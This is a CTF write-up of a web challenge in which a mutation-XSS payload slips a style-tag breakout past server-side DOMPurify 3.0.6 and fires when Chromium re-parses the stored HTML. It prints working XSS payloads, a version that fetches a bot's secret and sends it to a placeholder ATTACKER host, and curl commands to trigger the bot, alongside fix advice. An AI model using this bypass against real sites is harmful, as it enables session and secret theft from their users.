Note
A publishing app sanitizes a hand-built DOM tree with DOMPurify over JSDOM and ships the serialized string to a browser that re-parses it. A <style> rawtext breakout, hidden from DOMPurify by an element child, turns a "safe" tree into live XSS that steals the editor bot's secret.
inkpress — mXSS via server-side DOMPurify + JSDOM reparse
CTF: Midnight Flag Finals 2026 · Category: Web · Stack: Node / Express, DOMPurify 3.0.6, JSDOM 23.0.1, puppeteer-core
Challenge overview
Inkpress is a small publishing platform. You compose a "story" out of structured blocks, preview it,
publish it to a shareable URL /p/:id, and can ask the editorial desk (a headless Chromium bot) to
read it. The bot holds an httpOnly session cookie and the flag is the app SECRET, returned only to
that session by /api/account:
app.get('/api/account', (req, res) => {
const cookies = parseCookies(req.headers.cookie);
if (cookies.session && cookies.session === editorSession) {
return res.json({ role: 'editor', name: 'Editorial desk', secret: SECRET });
}
res.status(401).json({ error: 'sign in required' });
});
So the goal is classic: get XSS in the bot's browser, then fetch('/api/account') and exfiltrate
secret.
How content is built and rendered
You don't submit raw HTML. You submit a JSON tree of { tag, attrs, children } blocks, and the
server walks it into a real DOM with buildNode, sanitizes the whole <article> with DOMPurify
running on a JSDOM window, and stores the serialized string (server.js):
function buildNode(document, spec, depth) {
if (depth > 64) throw new Error('document nesting too deep');
if (typeof spec.text === 'string') return document.createTextNode(spec.text);
const tag = String(spec.tag || '').toLowerCase();
if (!/^[a-z][a-z0-9]*$/.test(tag)) throw new Error('invalid tag name');
const el = document.createElement(tag);
if (spec.attrs && typeof spec.attrs === 'object') {
for (const key of Object.keys(spec.attrs)) {
if (!/^[a-zA-Z_:][\w:.-]*$/.test(key)) continue;
try { el.setAttribute(key, String(spec.attrs[key])); } catch (e) {}
}
}
if (Array.isArray(spec.children))
for (const child of spec.children) el.appendChild(buildNode(document, child, depth + 1));
return el;
}
function renderDocument(tree) {
const window = new JSDOM('').window;
const document = window.document;
const DOMPurify = createDOMPurify(window);
const root = document.createElement('article');
for (const node of nodes) root.appendChild(buildNode(document, node, 0));
return DOMPurify.sanitize(root); // returns a STRING (root.innerHTML), stored as post.html
}
The published page /p/:id then drops that stored string into the DOM in the browser:
const data = ${data}; // { title, html }
document.getElementById('post').innerHTML = data.html; // <-- re-parsed by Chromium
That last line is the whole bug surface. DOMPurify only promises that the node tree it returns is safe — not that the string you get from serializing it is safe to feed to a different HTML parser.
The core insight: two HTML engines
Sanitization happens server-side in JSDOM; insertion happens client-side in Chromium. Two parsers touch the same bytes:
- JSDOM parses the tree and DOMPurify sanitizes it.
- JSDOM serializes the clean tree to a string (the
innerHTMLgetter). - Chromium re-parses that string via
element.innerHTML.
mXSS (mutation XSS) lives in step 2→3. The HTML serialization spec has rules that are perfectly safe as long as nobody re-parses the output — and we do re-parse it.
The key rule: rawtext elements (style, script, textarea, title, xmp, noscript,
iframe, noframes…) serialize their text content literally, without escaping. A </style>
inside a <style> text node serializes as the raw bytes </style>, not </style>. To JSDOM
that's inert character data nested in a node. To Chromium re-parsing it, that </style> closes the
element early and everything after becomes live markup.
Defeating DOMPurify's anti-mXSS gate
DOMPurify 3.0.6 has exactly one defense for this. In _sanitizeElements it force-removes an element
whose children are text only but whose text looks like markup:
// purify.cjs.js (3.0.6)
if (currentNode.hasChildNodes()
&& !_isNode(currentNode.firstElementChild) // no ELEMENT child
&& regExpTest(/<[/\w]/g, currentNode.innerHTML)
&& regExpTest(/<[/\w]/g, currentNode.textContent)) {
_forceRemove(currentNode); // a text-only <style>...</style> gets killed
}
A <style> whose only child is our breakout text is removed. But the gate short-circuits the moment
the element has an element child: firstElementChild becomes non-null, so
!_isNode(currentNode.firstElementChild) is false and the entire condition fails.
Because the challenge lets us build the node tree by hand, we just give <style> two children:
- a harmless element child (
<br>) →firstElementChildis non-null → gate skipped,<style>survives; - a text child carrying
</style><img ... onerror=...>→ DOMPurify (default config,SAFE_FOR_TEMPLATESunset) never treats text inside a rawtext element as markup, soonerroris never seen, never stripped.
This element-child bypass is patched in DOMPurify 3.1+.
What each engine sees
DOMPurify walks this and calls it clean (text is opaque inside style):
article
└─ style
├─ #text "</style><img src=1 onerror=alert(1)>" ← opaque chars to JSDOM
└─ br ← makes firstElementChild non-null
JSDOM serializes the text node literally (rawtext rule):
<article><style></style><img src=1 onerror=alert(1)><br></style></article>
Chromium re-parses that string: the first </style> closes the style early, <img> becomes a real,
live element, onerror fires.
Exploit
The JSON tree that proves XSS:
[
{
"tag": "style",
"children": [
{ "text": "</style><img src=1 onerror=alert(1)>" },
{ "tag": "br" }
]
}
]
Weaponized to steal the flag (keep the onerror body space-free so it stays a single unquoted attribute
after reparse):
[
{
"tag": "style",
"children": [
{ "text": "</style><img src=1 onerror=fetch('/api/account').then(r=>r.text()).then(s=>location='https://ATTACKER/?'+encodeURIComponent(s))>" },
{ "tag": "br" }
]
}
]
Publish it, then request a review so the editor bot opens /p/:id (the bot dwells ~5s, plenty of time):
# 1) publish, capture the id
ID=$(curl -s http://TARGET/api/posts -H 'Content-Type: application/json' \
-d '{"title":"x","tree":[{"tag":"style","children":[{"text":"</style><img src=1 onerror=fetch(`/api/account`).then(r=>r.text()).then(s=>location=`https://ATTACKER/?`+encodeURIComponent(s))>"},{"tag":"br"}]}]}' \
| python3 -c 'import sys,json;print(json.load(sys.stdin)["id"])')
# 2) make the editor bot read it
curl -s http://TARGET/api/review -H 'Content-Type: application/json' -d "{\"id\":\"$ID\"}"
The bot loads the page, the re-parsed <img> fires onerror, fetch('/api/account') returns
{ ..., secret: FLAG }, and it's sent to your listener.
Why the "obvious" path was a dead end
The first instinct (and a lot of wasted time during the CTF) was the deep-nesting DOMPurify CVE
(CVE-2024-47875) — wrapping <img> in ~500 <div> so the depth counter is bypassed. That doesn't apply
here: the app caps depth at 64 and rejects malformed tags, and more importantly the real bug isn't a CVE
at all — it's a serialization/reparse mXSS that exists by design when you sanitize server-side and
re-parse client-side. The fix would be to either run DOMPurify in the browser and insert via
RETURN_DOM_FRAGMENT + replaceChildren (so the string is never re-parsed), or upgrade DOMPurify and
not trust serialized output across parser boundaries.
Takeaways (generalized technique)
DOMPurify.sanitize(x)returning a string that is later fed to another HTML parser is an mXSS smell. The guarantee is about nodes, not strings.- Server-side sanitization (JSDOM) + client-side
innerHTML= two engines = a gap. - Rawtext elements (
style,textarea,title,xmp,noscript,iframe,noframes) serialize inner text unescaped — prime breakout vectors. - On DOMPurify ≤ 3.0.x, give a rawtext element an element child (
<br>) to skip thefirstElementChildanti-mXSS gate. - Safe usage:
DOMPurify.sanitize(dirty, { RETURN_DOM_FRAGMENT: true })thenreplaceChildren(frag)— no re-parse, no gap.
Sources & references
- Challenge source:
midnight_flag_finals_2026/web/inkpress - DOMPurify misconfigurations & bypasses (mizu.re): https://mizu.re/post/exploring-the-dompurify-library-bypasses-and-fixes
- CVE-2024-47875 (DOMPurify nesting/mXSS class): https://www.sentinelone.com/vulnerability-database/cve-2024-47875/